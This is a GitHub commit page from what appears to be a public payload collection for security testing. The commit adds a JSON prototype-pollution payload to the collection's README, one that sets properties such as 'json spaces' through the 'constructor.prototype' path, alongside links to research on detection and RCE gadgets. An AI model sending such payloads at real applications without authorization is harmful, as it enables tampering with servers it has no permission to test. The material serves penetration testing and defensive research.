Skip to content

Commit

Permalink
Merge pull request swisskyrepo#703 from Aftab700/JSON-Prototype-Pollu…
Browse files Browse the repository at this point in the history 
…tion

adding the payload for Polluting the prototype via the `constructor`  property in JSON input
  • Loading branch information
@swisskyrepo
swisskyrepo authored Jan 5, 2024
2 parents f96c1e4 + 08063f0 commit c6f96f7
Showing 1 changed file with 14 additions and 1 deletion.
15 changes: 14 additions & 1 deletion Prototype Pollution/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -99,6 +99,19 @@ Asynchronous payload for NodeJS.
}
```

Polluting the prototype via the `constructor` property instead.

```js
{
"constructor": {
"prototype": {
"foo": "bar",
"json spaces": 10
}
}
}
```


### Prototype Pollution in URL

Expand Down Expand Up @@ -176,4 +189,4 @@ Either create your own gadget using part of the source with [yeswehack/pp-finder
* [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov](https://youtu.be/v5dq80S1WF4)
* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
* [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023](https://portswigger.net/research/server-side-prototype-pollution)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)

0 comments on commit c6f96f7

Please sign in to comment.